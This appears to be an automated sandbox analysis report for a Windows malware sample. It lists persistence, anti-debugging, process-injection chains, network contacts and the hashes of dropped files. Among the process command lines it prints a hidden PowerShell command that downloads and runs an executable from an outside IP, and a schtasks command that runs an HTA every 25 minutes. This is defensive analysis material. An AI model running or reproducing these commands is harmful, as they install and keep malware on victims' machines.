Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cebafffffcbc = "\"C:\\ProgramData\\cebafffffcbc.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3436 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2244 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4820 wrote to memory of 4824 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 4824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1244 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4328 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 4328 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 1624 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4328 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 4656 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
US 150.171.28.10:443 g.bing.com tcp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

MD5 42bcecbc4a9d0c9e72120f0a60102147
SHA1 026d375bc2a684027fb8532af83ce2991509e1f1
SHA256 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b
SHA512 d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

memory/4824-2-0x0000000002A60000-0x0000000002A96000-memory.dmp

memory/4824-3-0x0000000005210000-0x0000000005838000-memory.dmp

memory/4824-4-0x00000000051A0000-0x00000000051C2000-memory.dmp

memory/4824-5-0x0000000005970000-0x00000000059D6000-memory.dmp

memory/4824-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vad1iwme.c10.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4824-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/4824-17-0x0000000006040000-0x000000000605E000-memory.dmp

memory/4824-18-0x0000000006090000-0x00000000060DC000-memory.dmp

memory/4824-19-0x0000000007780000-0x0000000007DFA000-memory.dmp

memory/4824-20-0x0000000006580000-0x000000000659A000-memory.dmp

memory/4824-22-0x00000000075A0000-0x0000000007636000-memory.dmp

memory/4824-23-0x0000000007530000-0x0000000007552000-memory.dmp

memory/4824-24-0x00000000083B0000-0x0000000008954000-memory.dmp

C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

MD5 3147e388f1f2ad94f26aee55a4267b8c
SHA1 b3dfd5bb152b1b8e338586ea1e2d240cde6503b3
SHA256 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b
SHA512 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

memory/1244-32-0x0000000000400000-0x000000000089F000-memory.dmp

memory/4328-46-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/1244-48-0x0000000000400000-0x000000000089F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

MD5 19668940080169c70b830bed8c390783
SHA1 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1
SHA256 cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c
SHA512 c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

memory/1624-63-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

memory/3424-65-0x00000000091C0000-0x0000000009265000-memory.dmp

memory/1624-68-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp

memory/3424-64-0x00000000091C0000-0x0000000009265000-memory.dmp

memory/4328-69-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4328-70-0x0000000000230000-0x00000000006CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

MD5 e82c4c3f7a2994eeecc1f81a5e4a4180
SHA1 660820f778073332dcd5ec446d2fcf00de887abd
SHA256 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3
SHA512 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

memory/4980-89-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4980-91-0x0000000000230000-0x00000000006CF000-memory.dmp

memory/4328-92-0x0000000000230000-0x00000000006CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

MD5 02579a797e919dcaf5758fbcbe34b093
SHA1 7668fff0888f4c7ad7a83b24f8c6d4009c10e534
SHA256 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c
SHA512 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5